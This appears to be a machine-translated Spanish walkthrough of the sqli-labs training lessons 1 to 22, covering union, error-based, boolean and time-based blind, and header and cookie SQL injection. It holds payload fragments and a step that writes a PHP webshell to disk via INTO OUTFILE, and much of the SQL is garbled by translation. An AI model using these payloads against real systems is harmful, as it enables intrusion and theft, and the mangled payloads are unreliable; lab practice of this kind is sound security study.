sqli-labs(lección1-lección22)
Error al insertar comillas simples
El id está entre comillas simples, confirma el número de campos
El campo es 3, usa union select 1,2 , 3 declaración de consulta sindical para ver ¿Hay una posición de visualización de la página?
Hay dos posiciones de visualización y luego comenzará la explosión del inventario
Lista de explosión
Lista de explosión
Valor de explosión
Inserción de comillas simples
Según el error de inyección numérica, el método de inyección es el mismo que el anterior, excepto que las comillas simples son eliminado
Si hay un error al insertar comillas simples, ingrese ?id=1') --+ Se descubre que se puede mostrar normalmente y se considera una inyección de caracteres
El método de inyección es el mismo que el anterior, solo agregue paréntesis después de las comillas simples
No hay respuesta al insertar comillas simples
El método de inyección es el mismo que el anterior
Cuando vea este error, puede ser inyección ciega booleana, inyección ciega de tiempo e inyección de error
Inyección
Considere usar la inyección de error
y (seleccione 1 de (seleccione count(),concat((carga útil),)) piso (rand(0) 2))x de information_schema.tables grupo por x)a)
donde está la carga útil la declaración SQL que desea insertar
Tenga en cuenta que esta declaración limita la salida a 64 caracteres
y updatexml(1,payload,1)
La misma declaración también limita la longitud de la salida a 32 caracteres
Y la declaración también limita el tipo de retorno de la carga útil, que solo funciona cuando la carga útil no está en formato xml
y extractvalue( 1, carga útil)
La longitud del carácter de salida está limitada a 32 bits como máximo.
Utilice la inyección de declaración de error de piso
Cuando la información de salida excede una línea, solo puede usar el límite 0,1 para generar línea por línea
Después de la biblioteca sale el nombre, el siguiente método será el mismo que antes
El principio es el mismo, simplemente reemplace las comillas simples de ?id=1' con comillas dobles
Enter ? id=1
Ingrese? id=1
Ingrese ?id=1 y 1=2 y la visualización será normal, no se inyectan números
. Intenté agregar comillas simples, encontré un error, lo cambié a comillas dobles, sigue igual, más ) o error
Ingrese id=5')--+
Use declaración p>
Escribir correctamente
Cargar troyano, usar cknife Link
?id=-1')) union select 1,"",3 en el archivo de salida "D:\Software\phpstudy \PHPTutorial\MySQL\muma.php" --+
Enter?id=2' --+ Volver a la normalidad
Inyección de caracteres, igual que arriba
Ingresar? id=1' y dormir(5) --+ Hay un retraso, confirme la inyección retrasada
Igual que arriba, reemplace las comillas simples con comillas dobles
Interfaz de inicio de sesión, use una contraseña común
Inicie sesión exitosamente, abra la explosión
Biblioteca de explosiones: p>
Tabla de explosión:
Campo de explosión:
El método siguiente es el mismo que el anterior
p>La página no devuelve información, solo inyección ciega
Adivina la longitud
admin') o longitud(database())>longitud para adivinar y dormir(5)#
Adivina el nombre de la biblioteca :
admin') o left(version(),1)>'el nombre de la biblioteca para adivinar' y dormir(5)#
Adivinar el nombre de la tabla:
admin') o ascii(substr((seleccione nombre_tabla de information_schema.table
donde table_schema= base de datos() límite 0,1),1,1) )>nombre_tabla adivine ASCII y duerma(5 )#
Mismo método que el anterior
Mismo método que el anterior
Mismo método que el anterior
Mismo método que el anterior
p>
El método es el mismo que el anterior, sin información de retorno, pero puede usar la inyección retrasada para determinar el punto de inyección
El método es el mismo que el anterior
El método es el mismo que el anterior
Realizar cierre automático, verificar el código fuente
Inyección de nombre de usuario y contraseña del mod
Verificar el código fuente p>
Es posible utilizar el agente de usuario integrado para inyección, en el paquete brupsuit capturado Cambiar agente de usuario
Obtener la versión de mysql
De la misma manera, puede obtenga el nombre de la tabla y otra información
Nombre de la tabla
Inyección de referencia
Ver código fuente
Hay inyección de cookies
Lo mismo ocurre con otros
Igual que la pregunta anterior, pertenece a la inyección de cookies, consulte el código fuente.
Es básicamente lo mismo que la pregunta anterior, pero base64 cifra el nombre de usuario y luego solo las declaraciones inyectadas.
Inyección de error
Básicamente igual que la pregunta anterior, "cambiado a"
Igual que la pregunta anterior.